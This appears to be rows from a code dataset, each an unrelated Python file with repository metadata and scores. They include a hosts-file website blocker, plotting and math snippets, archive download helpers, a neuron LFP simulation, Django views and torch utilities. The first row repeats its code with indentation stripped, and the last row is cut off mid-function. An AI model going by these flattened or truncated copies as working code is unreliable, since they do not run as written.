    def notify(self, message, title=APP_NAME, duration=NOTIFY_DURATION):
        "Sends notification to CLI and - if available - to GUI"
        print(message)
        # win_notify is False when win10toast is unavailable (non-Windows).
        if win_notify:
            win_notify.show_toast(title, message, duration=duration)
    def _raise_permission_error(self):
        self.notify("Permission Error. Please run the command line tool as ADMINISTRATOR.")
__all__ = ['APP_NAME', 'REDIRECT', 'WIN_PATH', 'LINUX_PATH', 'NOTIFY_DURATION', 'ICON_PATH', 'host_fp', 'host_fp_copy',
'host_fp_blocked', 'Blocker']
# Cell
from pathlib import Path
from shutil import copy
import beproductive.config as config
import sys
try:
from win10toast import ToastNotifier
win_notify = ToastNotifier()
except:
win_notify = False
# Cell
APP_NAME = 'Be Productive'
REDIRECT = '127.0.0.1'
WIN_PATH = r'C:\Windows\System32\drivers\etc'
LINUX_PATH = r'/etc'
NOTIFY_DURATION = 5 # CHANGE TO 5 FOR PRODUCTION
ICON_PATH = 'icon.ico'
if sys.platform == 'win32':
host_path = Path(WIN_PATH)
else:
host_path = Path(LINUX_PATH)
host_fp = host_path/'hosts'
host_fp_copy = host_path/'hosts.original'
host_fp_blocked = host_path/'hosts.blocked'
# Cell
class Blocker():
"The core of the package. It modifies the hosts file of the OS."
def __init__(self, redirect=REDIRECT):
self.adminrights = False
self.redirect = redirect
self.blocklist = config.load_config()
if not host_fp_copy.exists():
self._setup()
if self._create_blocked_list():
self.adminrights = True
def _setup(self):
"Creates a copy of the `hosts` file and saves it as `hosts.original`"
try:
copy(host_fp, host_fp_copy)
self.notify("Setup successful")
except PermissionError:
self._raise_permission_error()
def _create_blocked_list(self):
"Creates a copy of `hosts.original` and saves it to `hosts.blocked`. Then adds all blocked sites."
try:
copy(host_fp_copy, host_fp_blocked)
with open(host_fp_blocked, "a") as blocked_file:
for url in self.blocklist:
# TODO: refine, add www only if not in url, remove www if in url
blocked_file.write(f"{self.redirect} {url} www.{url} api.{url}\n")
# Special case for Twitter which has a special API URL
if url == 'twitter.com':
blocked_file.write(f"{self.redirect} tpop-api.twitter.com\n")
return True
except PermissionError:
self._raise_permission_error()
return False
def block(self, notify=False):
"Blocks all specified websites by replacing `hosts` file with `hosts.blocked`"
try:
copy(host_fp_blocked, host_fp)
except PermissionError:
self._raise_permission_error()
return False
if notify:
self.notify("Websites blocked, enjoy your work.")
return "Websites blocked"
def unblock(self, notify=False):
"Unblocks all websites by restoring the original `hosts` file"
try:
copy(host_fp_copy, host_fp)
except PermissionError:
self._raise_permission_error()
return False
if notify:
self.notify("All websites unblocked.")
return "Websites unblocked"
def notify(self, message, title=APP_NAME, duration=NOTIFY_DURATION):
"Sends notification to CLI and - if available - to GUI"
print(message)
if win_notify:
win_notify.show_toast(title, message, duration=duration)
def _raise_permission_error(self):
self.notify("Permission Error. Please run the command line tool as ADMINISTRATOR.") | en | 0.560087 | # AUTOGENERATED! DO NOT EDIT! File to edit: 01_blocker.ipynb (unless otherwise specified). # Cell # Cell # CHANGE TO 5 FOR PRODUCTION # Cell # TODO: refine, add www only if not in url, remove www if in url # Special case for Twitter which has a special API URL | 2.03647 | 2 |
doc/users/plotting/examples/anchored_box03.py | pierre-haessig/matplotlib | 16 | 6623916 | from matplotlib.patches import Ellipse
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid.anchored_artists import AnchoredAuxTransformBox
fig=plt.figure(1, figsize=(3,3))
ax = plt.subplot(111)
box = AnchoredAuxTransformBox(ax.transData, loc=2)
el = Ellipse((0,0), width=0.1, height=0.4, angle=30) # in data coordinates!
box.drawing_area.add_artist(el)
ax.add_artist(box)
plt.show()
| from matplotlib.patches import Ellipse
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid.anchored_artists import AnchoredAuxTransformBox
fig=plt.figure(1, figsize=(3,3))
ax = plt.subplot(111)
box = AnchoredAuxTransformBox(ax.transData, loc=2)
el = Ellipse((0,0), width=0.1, height=0.4, angle=30) # in data coordinates!
box.drawing_area.add_artist(el)
ax.add_artist(box)
plt.show()
| en | 0.566245 | # in data coordinates! | 2.808593 | 3 |
experiment_2_face_tasks/Doric/__init__.py | arcosin/Task-Detector | 0 | 6623917 | <reponame>arcosin/Task-Detector
from .ProgNet import ProgBlock
from .ProgNet import ProgMultiBlock
from .ProgNet import ProgColumnGenerator
from .ProgNet import ProgColumn
from .ProgNet import ProgNet
from .ProgBlocks import ProgDenseBlock
from .ProgBlocks import ProgDenseBNBlock
from .ProgBlocks import ProgMultiDense
from .ProgBlocks import ProgMultiDenseBN
from .ProgBlocks import ProgMultiDenseSum
from .ProgBlocks import ProgMultiDenseConcat
from .ProgBlocks import ProgLambdaBlock
from .ProgBlocks import ProgInertBlock
from .extra_blocks.ConvBlocks import ProgConv2DBlock
from .extra_blocks.ConvBlocks import ProgConvTranspose2DBNBlock
from .extra_blocks.ConvBlocks import ProgConv2DBNBlock
from .extra_blocks.ConvBlocks import ProgDeformConv2DBlock
from .extra_blocks.ConvBlocks import ProgDeformConv2DBNBlock
from .ProgNetTarget import ProgNetWithTarget
from .DynamicProgNet import DynamicProgNet
DORIC_VERSION = "1.0.1"
#===============================================================================
| from .ProgNet import ProgBlock
from .ProgNet import ProgMultiBlock
from .ProgNet import ProgColumnGenerator
from .ProgNet import ProgColumn
from .ProgNet import ProgNet
from .ProgBlocks import ProgDenseBlock
from .ProgBlocks import ProgDenseBNBlock
from .ProgBlocks import ProgMultiDense
from .ProgBlocks import ProgMultiDenseBN
from .ProgBlocks import ProgMultiDenseSum
from .ProgBlocks import ProgMultiDenseConcat
from .ProgBlocks import ProgLambdaBlock
from .ProgBlocks import ProgInertBlock
from .extra_blocks.ConvBlocks import ProgConv2DBlock
from .extra_blocks.ConvBlocks import ProgConvTranspose2DBNBlock
from .extra_blocks.ConvBlocks import ProgConv2DBNBlock
from .extra_blocks.ConvBlocks import ProgDeformConv2DBlock
from .extra_blocks.ConvBlocks import ProgDeformConv2DBNBlock
from .ProgNetTarget import ProgNetWithTarget
from .DynamicProgNet import DynamicProgNet
DORIC_VERSION = "1.0.1"
#=============================================================================== | fr | 0.346644 | #=============================================================================== | 1.25846 | 1 |
ex018.py | gabrieleliasdev/python-cev | 0 | 6623918 | from math import sin, cos, tan, radians
a = float(input('\nType the angle you want:\n>>> '))
s = sin(radians(a))
c = cos(radians(a))
t = tan(radians(a))
print('\nThe is Sine: {:.2f} | Cosine: {:.2f} | Tangent: {:.2f}\n'.format(s,c,t))
| from math import sin, cos, tan, radians
a = float(input('\nType the angle you want:\n>>> '))
s = sin(radians(a))
c = cos(radians(a))
t = tan(radians(a))
print('\nThe is Sine: {:.2f} | Cosine: {:.2f} | Tangent: {:.2f}\n'.format(s,c,t))
| none | 1 | 4.143839 | 4 | |
constants.py | kennjr/PasswordLocker | 0 | 6623919 | <gh_stars>0
database_name = "lockerdatabase.db"
create_login_table_str = """ CREATE TABLE IF NOT EXISTS Login (
id INTEGER PRIMARY KEY,
username TEXT NOT NULL,
password TEXT NOT NULL,
date_logged_in TEXT NOT NULL
); """
check_if_table_exists_str = """SELECT count(name) FROM sqlite_master WHERE type='table' AND name='Login' """
| database_name = "lockerdatabase.db"
create_login_table_str = """ CREATE TABLE IF NOT EXISTS Login (
id INTEGER PRIMARY KEY,
username TEXT NOT NULL,
password TEXT NOT NULL,
date_logged_in TEXT NOT NULL
); """
check_if_table_exists_str = """SELECT count(name) FROM sqlite_master WHERE type='table' AND name='Login' """ | en | 0.397143 | CREATE TABLE IF NOT EXISTS Login ( id INTEGER PRIMARY KEY, username TEXT NOT NULL, password TEXT NOT NULL, date_logged_in TEXT NOT NULL ); SELECT count(name) FROM sqlite_master WHERE type='table' AND name='Login' | 2.93713 | 3 |
gen_route.py | yang0/proxy | 0 | 6623920 | from haipproxy.utils.route_info import gen_route_updater
if __name__ == '__main__':
gen_route_updater() | from haipproxy.utils.route_info import gen_route_updater
if __name__ == '__main__':
gen_route_updater() | none | 1 | 1.189085 | 1 | |
mlxtend/mlxtend/image/utils.py | WhiteWolf21/fp-growth | 0 | 6623921 | # <NAME> 2014-2020
# contributor: <NAME>
# mlxtend Machine Learning Library Extensions
#
# A counter class for printing the progress of an iterator.
# Author: <NAME> <<EMAIL>>
#
# License: BSD 3 clause
import os
import tarfile
import zipfile
import bz2
import imageio
def check_exists(path):
path = os.path.expanduser(path)
return os.path.exists(path)
def makedir(path):
path = os.path.expanduser(path)
if not check_exists(path):
os.makedirs(path)
def listdir(path, extensions=''):
path = os.path.expanduser(path)
if check_exists(path):
return [f for f in os.listdir(path) if f.endswith(extensions)]
else:
raise FileNotFoundError
def read_image(filename, path=None):
if path is not None:
path = os.path.expanduser(path)
filename = os.path.join(path, filename)
if check_exists(filename):
return imageio.imread(filename)
else:
raise FileNotFoundError
def download_url(url, save_path):
from six.moves import urllib
save_path = os.path.expanduser(save_path)
if not check_exists(save_path):
makedir(save_path)
filename = url.rpartition('/')[2]
filepath = os.path.join(save_path, filename)
try:
print('Downloading '+url+' to '+filepath)
urllib.request.urlretrieve(url, filepath)
except ValueError:
raise Exception('Failed to download! Check URL: ' + url +
' and local path: ' + save_path)
def extract_file(path, to_directory=None):
path = os.path.expanduser(path)
if path.endswith('.zip'):
opener, mode = zipfile.ZipFile, 'r'
elif path.endswith(('.tar.gz', '.tgz')):
opener, mode = tarfile.open, 'r:gz'
elif path.endswith(('tar.bz2', '.tbz')):
opener, mode = tarfile.open, 'r:bz2'
elif path.endswith('.bz2'):
opener, mode = bz2.BZ2File, 'rb'
with open(path[:-4], 'wb') as fp_out, opener(path, 'rb') as fp_in:
for data in iter(lambda: fp_in.read(100 * 1024), b''):
fp_out.write(data)
return
else:
raise (ValueError,
"Could not extract `{}` as no extractor is found!".format(path))
if to_directory is None:
to_directory = os.path.abspath(os.path.join(path, os.path.pardir))
cwd = os.getcwd()
os.chdir(to_directory)
try:
file = opener(path, mode)
try:
file.extractall()
finally:
file.close()
finally:
os.chdir(cwd)
| # <NAME> 2014-2020
# contributor: <NAME>
# mlxtend Machine Learning Library Extensions
#
# A counter class for printing the progress of an iterator.
# Author: <NAME> <<EMAIL>>
#
# License: BSD 3 clause
import os
import tarfile
import zipfile
import bz2
import imageio
def check_exists(path):
path = os.path.expanduser(path)
return os.path.exists(path)
def makedir(path):
path = os.path.expanduser(path)
if not check_exists(path):
os.makedirs(path)
def listdir(path, extensions=''):
path = os.path.expanduser(path)
if check_exists(path):
return [f for f in os.listdir(path) if f.endswith(extensions)]
else:
raise FileNotFoundError
def read_image(filename, path=None):
if path is not None:
path = os.path.expanduser(path)
filename = os.path.join(path, filename)
if check_exists(filename):
return imageio.imread(filename)
else:
raise FileNotFoundError
def download_url(url, save_path):
from six.moves import urllib
save_path = os.path.expanduser(save_path)
if not check_exists(save_path):
makedir(save_path)
filename = url.rpartition('/')[2]
filepath = os.path.join(save_path, filename)
try:
print('Downloading '+url+' to '+filepath)
urllib.request.urlretrieve(url, filepath)
except ValueError:
raise Exception('Failed to download! Check URL: ' + url +
' and local path: ' + save_path)
def extract_file(path, to_directory=None):
path = os.path.expanduser(path)
if path.endswith('.zip'):
opener, mode = zipfile.ZipFile, 'r'
elif path.endswith(('.tar.gz', '.tgz')):
opener, mode = tarfile.open, 'r:gz'
elif path.endswith(('tar.bz2', '.tbz')):
opener, mode = tarfile.open, 'r:bz2'
elif path.endswith('.bz2'):
opener, mode = bz2.BZ2File, 'rb'
with open(path[:-4], 'wb') as fp_out, opener(path, 'rb') as fp_in:
for data in iter(lambda: fp_in.read(100 * 1024), b''):
fp_out.write(data)
return
else:
raise (ValueError,
"Could not extract `{}` as no extractor is found!".format(path))
if to_directory is None:
to_directory = os.path.abspath(os.path.join(path, os.path.pardir))
cwd = os.getcwd()
os.chdir(to_directory)
try:
file = opener(path, mode)
try:
file.extractall()
finally:
file.close()
finally:
os.chdir(cwd)
| en | 0.539263 | # <NAME> 2014-2020 # contributor: <NAME> # mlxtend Machine Learning Library Extensions # # A counter class for printing the progress of an iterator. # Author: <NAME> <<EMAIL>> # # License: BSD 3 clause | 2.683653 | 3 |
tests/typecheck/example_rat.py | yangdanny97/chocopy-python-compiler | 7 | 6623922 | class Rat(object):
n : int = 0
d : int = 0
def __init__(self : Rat):
pass
def new(self : Rat, n : int, d : int) -> Rat:
self.n = n
self.d = d
return self
def mul(self : Rat, other : Rat) -> Rat:
return Rat().new(self.n * other.n, self.d * other.d)
r1 : Rat = None
r2 : Rat = None
r1 = Rat().new(4, 5)
r2 = Rat().new(2, 3)
print(r1.mul(r2).mul(r2).n) | class Rat(object):
n : int = 0
d : int = 0
def __init__(self : Rat):
pass
def new(self : Rat, n : int, d : int) -> Rat:
self.n = n
self.d = d
return self
def mul(self : Rat, other : Rat) -> Rat:
return Rat().new(self.n * other.n, self.d * other.d)
r1 : Rat = None
r2 : Rat = None
r1 = Rat().new(4, 5)
r2 = Rat().new(2, 3)
print(r1.mul(r2).mul(r2).n) | none | 1 | 3.851952 | 4 | |
tests/cases/fib.py | MiguelMarcelino/py2many | 2 | 6623923 | #!/usr/bin/env python3
def fib(i: int) -> int:
if i == 0 or i == 1:
return 1
return fib(i - 1) + fib(i - 2)
if __name__ == "__main__":
assert fib(0) == 1
assert fib(1) == 1
assert fib(5) == 8
assert fib(30) == 1346269
print("OK")
| #!/usr/bin/env python3
def fib(i: int) -> int:
if i == 0 or i == 1:
return 1
return fib(i - 1) + fib(i - 2)
if __name__ == "__main__":
assert fib(0) == 1
assert fib(1) == 1
assert fib(5) == 8
assert fib(30) == 1346269
print("OK")
| fr | 0.221828 | #!/usr/bin/env python3 | 3.7587 | 4 |
ctf/models/Score.py | owenofengland/lCTF-Platform | 0 | 6623924 | <gh_stars>0
from . import User
from ctf import db
from sys import path
path.append("..")
class Score(db.Model):
id = db.Column(db.Integer, primary_key=True)
score = db.Column(db.Integer, default=0)
username = db.Column(db.String, db.ForeignKey('user.username'))
| from . import User
from ctf import db
from sys import path
path.append("..")
class Score(db.Model):
id = db.Column(db.Integer, primary_key=True)
score = db.Column(db.Integer, default=0)
username = db.Column(db.String, db.ForeignKey('user.username')) | none | 1 | 2.346419 | 2 | |
simulation-code/old_functions/Main_Sim_with_Kernel.py | young24/LFP-simulation-in-turtle-brain | 0 | 6623925 | # -*- coding: utf-8 -*-
"""
Created on Fri Apr 08 13:46:08 2016
Main_Sim_with_Kernel
@author: superuser
"""
import os
from os.path import join
import time
import multiprocessing
import numpy as np
from scipy.interpolate import RegularGridInterpolator
def make_2D_to_3D(data,xLen,yLen):
'make linear xy index into 2d index'
data3D = np.zeros((xLen,yLen,np.shape(data)[1]))
for x in range(0,xLen):
for y in range(0,yLen):
data3D[x,y,:] = data[x*yLen+y,:]
return data3D
def calc_LFP(t):
print(t) # show the progress
xLen = 11
yLen = 11
lengthMEA = 500
zMin = -110
zMax = 220
zShift = 20 # z shift between stimulated neuron and cell layer
x = np.linspace(-lengthMEA,lengthMEA,xLen)
y = np.linspace(-lengthMEA,lengthMEA,yLen)
z = np.linspace(zMin,zMax,34)
kernelData = np.load('../Data/Python/kernelData_soma_z120.npy')
axonSyn = np.load('../Data/Python/axonSyn.npy')
LFPonMEA = np.zeros((xLen,yLen))
data = kernelData[:,t,:]
data3D = make_2D_to_3D(data,xLen,yLen)
LFP = RegularGridInterpolator((x, y, z), data3D)
interval = 100
for x_idx in range(0,xLen):
for y_idx in range(0,yLen):
sumLFP = 0
for pos in axonSyn:
if (-lengthMEA<=((x_idx-(xLen-1)/2)*interval-pos[0])<=lengthMEA and
-lengthMEA<=((y_idx-(xLen-1)/2)*interval-pos[1])<=lengthMEA and
zMin<=pos[2]-zShift<=zMax):
sumLFP += LFP([(x_idx-(xLen-1)/2)*interval-pos[0],
(y_idx-(yLen-1)/2)*interval-pos[1],pos[2]-zShift])
LFPonMEA[x_idx,y_idx] = sumLFP
folder = 'LFPonMEA'
if not os.path.isdir(folder):
os.mkdir(folder)
np.save(join(folder, 'LFPonMEAt'+str(t)+'.npy'),LFPonMEA)
def make_files_together(xLen,yLen):
'stack different time files into a single file'
LFPonMEA = np.zeros((xLen,yLen,401))
for t in range(0,401):
LFPonMEA[:,:,t] = np.load('LFPonMEA/LFPonMEAt'+str(t)+'.npy')
return LFPonMEA
if __name__ == '__main__':
start = time.time()
pool = multiprocessing.Pool(processes=4)
t = range(0,401)
pool.map(calc_LFP, t)
pool.close()
pool.join()
xLen = 11 # keep consistent with before ones
yLen = 11
LFPonMEA = make_files_together(xLen,yLen)
np.save('LFPonMEA.npy',LFPonMEA)
end = time.time()
print(end-start)
| # -*- coding: utf-8 -*-
"""
Created on Fri Apr 08 13:46:08 2016
Main_Sim_with_Kernel
@author: superuser
"""
import os
from os.path import join
import time
import multiprocessing
import numpy as np
from scipy.interpolate import RegularGridInterpolator
def make_2D_to_3D(data,xLen,yLen):
'make linear xy index into 2d index'
data3D = np.zeros((xLen,yLen,np.shape(data)[1]))
for x in range(0,xLen):
for y in range(0,yLen):
data3D[x,y,:] = data[x*yLen+y,:]
return data3D
def calc_LFP(t):
print(t) # show the progress
xLen = 11
yLen = 11
lengthMEA = 500
zMin = -110
zMax = 220
zShift = 20 # z shift between stimulated neuron and cell layer
x = np.linspace(-lengthMEA,lengthMEA,xLen)
y = np.linspace(-lengthMEA,lengthMEA,yLen)
z = np.linspace(zMin,zMax,34)
kernelData = np.load('../Data/Python/kernelData_soma_z120.npy')
axonSyn = np.load('../Data/Python/axonSyn.npy')
LFPonMEA = np.zeros((xLen,yLen))
data = kernelData[:,t,:]
data3D = make_2D_to_3D(data,xLen,yLen)
LFP = RegularGridInterpolator((x, y, z), data3D)
interval = 100
for x_idx in range(0,xLen):
for y_idx in range(0,yLen):
sumLFP = 0
for pos in axonSyn:
if (-lengthMEA<=((x_idx-(xLen-1)/2)*interval-pos[0])<=lengthMEA and
-lengthMEA<=((y_idx-(xLen-1)/2)*interval-pos[1])<=lengthMEA and
zMin<=pos[2]-zShift<=zMax):
sumLFP += LFP([(x_idx-(xLen-1)/2)*interval-pos[0],
(y_idx-(yLen-1)/2)*interval-pos[1],pos[2]-zShift])
LFPonMEA[x_idx,y_idx] = sumLFP
folder = 'LFPonMEA'
if not os.path.isdir(folder):
os.mkdir(folder)
np.save(join(folder, 'LFPonMEAt'+str(t)+'.npy'),LFPonMEA)
def make_files_together(xLen,yLen):
'stack different time files into a single file'
LFPonMEA = np.zeros((xLen,yLen,401))
for t in range(0,401):
LFPonMEA[:,:,t] = np.load('LFPonMEA/LFPonMEAt'+str(t)+'.npy')
return LFPonMEA
if __name__ == '__main__':
start = time.time()
pool = multiprocessing.Pool(processes=4)
t = range(0,401)
pool.map(calc_LFP, t)
pool.close()
pool.join()
xLen = 11 # keep consistent with before ones
yLen = 11
LFPonMEA = make_files_together(xLen,yLen)
np.save('LFPonMEA.npy',LFPonMEA)
end = time.time()
print(end-start)
| en | 0.801362 | # -*- coding: utf-8 -*- Created on Fri Apr 08 13:46:08 2016 Main_Sim_with_Kernel @author: superuser # show the progress # z shift between stimulated neuron and cell layer # keep consistent with before ones | 2.341095 | 2 |
runtests.py | seatme/django-axes | 0 | 6623926 | <reponame>seatme/django-axes<filename>runtests.py
#!/usr/bin/env python
import os
import sys
import django
from django.conf import settings
from django.test.utils import get_runner
def run_tests(settings_module, *modules):
os.environ['DJANGO_SETTINGS_MODULE'] = settings_module
django.setup()
TestRunner = get_runner(settings)
test_runner = TestRunner()
failures = test_runner.run_tests(*modules)
sys.exit(bool(failures))
if __name__ == '__main__':
run_tests('axes.test_settings', [
'axes.tests.AccessAttemptTest',
'axes.tests.AccessAttemptConfigTest',
'axes.tests.UtilsTest',
])
| #!/usr/bin/env python
import os
import sys
import django
from django.conf import settings
from django.test.utils import get_runner
def run_tests(settings_module, *modules):
os.environ['DJANGO_SETTINGS_MODULE'] = settings_module
django.setup()
TestRunner = get_runner(settings)
test_runner = TestRunner()
failures = test_runner.run_tests(*modules)
sys.exit(bool(failures))
if __name__ == '__main__':
run_tests('axes.test_settings', [
'axes.tests.AccessAttemptTest',
'axes.tests.AccessAttemptConfigTest',
'axes.tests.UtilsTest',
]) | ru | 0.26433 | #!/usr/bin/env python | 1.871243 | 2 |
georiviere/finances_administration/views.py | georiviere/Georiviere-admin | 7 | 6623927 | <filename>georiviere/finances_administration/views.py<gh_stars>1-10
from django.views import generic as generic_views
from django.utils.translation import gettext_lazy as _
from mapentity import views as mapentity_views
from geotrek.authent.decorators import same_structure_required
from rest_framework import permissions as rest_permissions
from georiviere.main.views import FormsetMixin
from georiviere.finances_administration.models import AdministrativeFile, AdministrativeOperation
from georiviere.finances_administration.filters import AdministrativeFileFilterSet
from georiviere.finances_administration.forms import (
AdministrativeFileForm, AdministrativeOperationFormset, FundingFormSet,
ManDayFormSet, AdministrativeOperationCostsForm
)
from georiviere.finances_administration.serializers import AdministrativeFileSerializer, AdministrativeFileGeojsonSerializer
class AdministrativeFileFormsetMixin:
def form_valid(self, form):
context = self.get_context_data()
funding_formset = context['funding_formset']
adminoperation_formset = context['adminoperation_formset']
if form.is_valid():
administrative_file = form.save()
if funding_formset.is_valid():
funding_formset.instance = administrative_file
funding_formset.save()
else:
return self.form_invalid(form)
if adminoperation_formset.is_valid():
adminoperation_formset.instance = administrative_file
adminoperation_formset.save()
else:
return self.form_invalid(form)
return super().form_valid(form)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
if self.request.POST:
context['funding_formset'] = FundingFormSet(
self.request.POST,
instance=self.object
)
context['adminoperation_formset'] = AdministrativeOperationFormset(
self.request.POST,
instance=self.object
)
else:
context['funding_formset'] = FundingFormSet(
instance=self.object
)
context['adminoperation_formset'] = AdministrativeOperationFormset(
instance=self.object
)
return context
class AdministrativeFileList(mapentity_views.MapEntityList):
queryset = AdministrativeFile.objects.all()
filterform = AdministrativeFileFilterSet
columns = ['id', 'name']
class AdministrativeFileLayer(mapentity_views.MapEntityLayer):
queryset = AdministrativeFile.objects.all()
model = AdministrativeFile
properties = ['name']
def get_queryset(self):
return super().get_queryset()
class AdministrativeFileJsonList(mapentity_views.MapEntityJsonList, AdministrativeFileList):
pass
class AdministrativeFileFormat(mapentity_views.MapEntityFormat, AdministrativeFileList):
queryset = AdministrativeFile.objects.all()
class AdministrativeFileDocumentOdt(mapentity_views.MapEntityDocumentOdt):
queryset = AdministrativeFile.objects.all()
class AdministrativeFileDocumentWeasyprint(mapentity_views.MapEntityDocumentWeasyprint):
queryset = AdministrativeFile.objects.all()
class AdministrativeFileDetail(mapentity_views.MapEntityDetail):
queryset = AdministrativeFile.objects.all()
def get_context_data(self, *args, **kwargs):
context = super().get_context_data(*args, **kwargs)
context['can_edit'] = self.get_object().same_structure(self.request.user)
return context
class AdministrativeFileCreate(AdministrativeFileFormsetMixin, mapentity_views.MapEntityCreate):
model = AdministrativeFile
form_class = AdministrativeFileForm
class AdministrativeFileUpdate(AdministrativeFileFormsetMixin, mapentity_views.MapEntityUpdate):
model = AdministrativeFile
form_class = AdministrativeFileForm
@same_structure_required('finances_administration:administrativefile_detail')
def dispatch(self, *args, **kwargs):
return super().dispatch(*args, **kwargs)
class AdministrativeFileDelete(mapentity_views.MapEntityDelete):
model = AdministrativeFile
@same_structure_required('finances_administration:administrativefile_detail')
def dispatch(self, *args, **kwargs):
return super().dispatch(*args, **kwargs)
class AdministrativeFileViewSet(mapentity_views.MapEntityViewSet):
model = AdministrativeFile
queryset = AdministrativeFile.objects.all()
serializer_class = AdministrativeFileSerializer
geojson_serializer_class = AdministrativeFileGeojsonSerializer
permission_classes = [rest_permissions.DjangoModelPermissionsOrAnonReadOnly]
def get_queryset(self):
# Override annotation done by MapEntityViewSet.get_queryset()
return AdministrativeFile.objects.all()
class ManDayFormSet(FormsetMixin):
context_name = "manday_formset"
formset_class = ManDayFormSet
class AdministrativeOperationUpdate(ManDayFormSet, generic_views.UpdateView):
model = AdministrativeOperation
form_class = AdministrativeOperationCostsForm
def get_title(self):
return _("Edit costs for").format(self.get_object())
def get_success_url(self):
return self.get_object().administrative_file.get_detail_url()
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['title'] = self.get_title()
return context
| <filename>georiviere/finances_administration/views.py<gh_stars>1-10
from django.views import generic as generic_views
from django.utils.translation import gettext_lazy as _
from mapentity import views as mapentity_views
from geotrek.authent.decorators import same_structure_required
from rest_framework import permissions as rest_permissions
from georiviere.main.views import FormsetMixin
from georiviere.finances_administration.models import AdministrativeFile, AdministrativeOperation
from georiviere.finances_administration.filters import AdministrativeFileFilterSet
from georiviere.finances_administration.forms import (
AdministrativeFileForm, AdministrativeOperationFormset, FundingFormSet,
ManDayFormSet, AdministrativeOperationCostsForm
)
from georiviere.finances_administration.serializers import AdministrativeFileSerializer, AdministrativeFileGeojsonSerializer
class AdministrativeFileFormsetMixin:
def form_valid(self, form):
context = self.get_context_data()
funding_formset = context['funding_formset']
adminoperation_formset = context['adminoperation_formset']
if form.is_valid():
administrative_file = form.save()
if funding_formset.is_valid():
funding_formset.instance = administrative_file
funding_formset.save()
else:
return self.form_invalid(form)
if adminoperation_formset.is_valid():
adminoperation_formset.instance = administrative_file
adminoperation_formset.save()
else:
return self.form_invalid(form)
return super().form_valid(form)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
if self.request.POST:
context['funding_formset'] = FundingFormSet(
self.request.POST,
instance=self.object
)
context['adminoperation_formset'] = AdministrativeOperationFormset(
self.request.POST,
instance=self.object
)
else:
context['funding_formset'] = FundingFormSet(
instance=self.object
)
context['adminoperation_formset'] = AdministrativeOperationFormset(
instance=self.object
)
return context
class AdministrativeFileList(mapentity_views.MapEntityList):
queryset = AdministrativeFile.objects.all()
filterform = AdministrativeFileFilterSet
columns = ['id', 'name']
class AdministrativeFileLayer(mapentity_views.MapEntityLayer):
queryset = AdministrativeFile.objects.all()
model = AdministrativeFile
properties = ['name']
def get_queryset(self):
return super().get_queryset()
class AdministrativeFileJsonList(mapentity_views.MapEntityJsonList, AdministrativeFileList):
pass
class AdministrativeFileFormat(mapentity_views.MapEntityFormat, AdministrativeFileList):
queryset = AdministrativeFile.objects.all()
class AdministrativeFileDocumentOdt(mapentity_views.MapEntityDocumentOdt):
queryset = AdministrativeFile.objects.all()
class AdministrativeFileDocumentWeasyprint(mapentity_views.MapEntityDocumentWeasyprint):
queryset = AdministrativeFile.objects.all()
class AdministrativeFileDetail(mapentity_views.MapEntityDetail):
queryset = AdministrativeFile.objects.all()
def get_context_data(self, *args, **kwargs):
context = super().get_context_data(*args, **kwargs)
context['can_edit'] = self.get_object().same_structure(self.request.user)
return context
class AdministrativeFileCreate(AdministrativeFileFormsetMixin, mapentity_views.MapEntityCreate):
model = AdministrativeFile
form_class = AdministrativeFileForm
class AdministrativeFileUpdate(AdministrativeFileFormsetMixin, mapentity_views.MapEntityUpdate):
model = AdministrativeFile
form_class = AdministrativeFileForm
@same_structure_required('finances_administration:administrativefile_detail')
def dispatch(self, *args, **kwargs):
return super().dispatch(*args, **kwargs)
class AdministrativeFileDelete(mapentity_views.MapEntityDelete):
model = AdministrativeFile
@same_structure_required('finances_administration:administrativefile_detail')
def dispatch(self, *args, **kwargs):
return super().dispatch(*args, **kwargs)
class AdministrativeFileViewSet(mapentity_views.MapEntityViewSet):
model = AdministrativeFile
queryset = AdministrativeFile.objects.all()
serializer_class = AdministrativeFileSerializer
geojson_serializer_class = AdministrativeFileGeojsonSerializer
permission_classes = [rest_permissions.DjangoModelPermissionsOrAnonReadOnly]
def get_queryset(self):
# Override annotation done by MapEntityViewSet.get_queryset()
return AdministrativeFile.objects.all()
class ManDayFormSet(FormsetMixin):
context_name = "manday_formset"
formset_class = ManDayFormSet
class AdministrativeOperationUpdate(ManDayFormSet, generic_views.UpdateView):
model = AdministrativeOperation
form_class = AdministrativeOperationCostsForm
def get_title(self):
return _("Edit costs for").format(self.get_object())
def get_success_url(self):
return self.get_object().administrative_file.get_detail_url()
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['title'] = self.get_title()
return context
| en | 0.547028 | # Override annotation done by MapEntityViewSet.get_queryset() | 2.02809 | 2 |
alibi_detect/utils/pytorch/misc.py | sugatoray/alibi-detect | 1,227 | 6623928 | import torch
def zero_diag(mat: torch.Tensor) -> torch.Tensor:
"""
Set the diagonal of a matrix to 0
Parameters
----------
mat
A 2D square matrix
Returns
-------
A 2D square matrix with zeros along the diagonal
"""
return mat - torch.diag(mat.diag())
def quantile(sample: torch.Tensor, p: float, type: int = 7, sorted: bool = False) -> float:
"""
Estimate a desired quantile of a univariate distribution from a vector of samples
Parameters
----------
sample
A 1D vector of values
p
The desired quantile in (0,1)
type
The method for computing the quantile.
See https://wikipedia.org/wiki/Quantile#Estimating_quantiles_from_a_sample
sorted
Whether or not the vector is already sorted into ascending order
Returns
-------
An estimate of the quantile
"""
N = len(sample)
if len(sample.shape) != 1:
raise ValueError("Quantile estimation only supports vectors of univariate samples.")
if not 1/N <= p <= (N-1)/N:
raise ValueError(f"The {p}-quantile should not be estimated using only {N} samples.")
sorted_sample = sample if sorted else sample.sort().values
if type == 6:
h = (N+1)*p
elif type == 7:
h = (N-1)*p + 1
elif type == 8:
h = (N+1/3)*p + 1/3
h_floor = int(h)
quantile = sorted_sample[h_floor-1]
if h_floor != h:
quantile += (h - h_floor)*(sorted_sample[h_floor]-sorted_sample[h_floor-1])
return float(quantile)
| import torch
def zero_diag(mat: torch.Tensor) -> torch.Tensor:
"""
Set the diagonal of a matrix to 0
Parameters
----------
mat
A 2D square matrix
Returns
-------
A 2D square matrix with zeros along the diagonal
"""
return mat - torch.diag(mat.diag())
def quantile(sample: torch.Tensor, p: float, type: int = 7, sorted: bool = False) -> float:
"""
Estimate a desired quantile of a univariate distribution from a vector of samples
Parameters
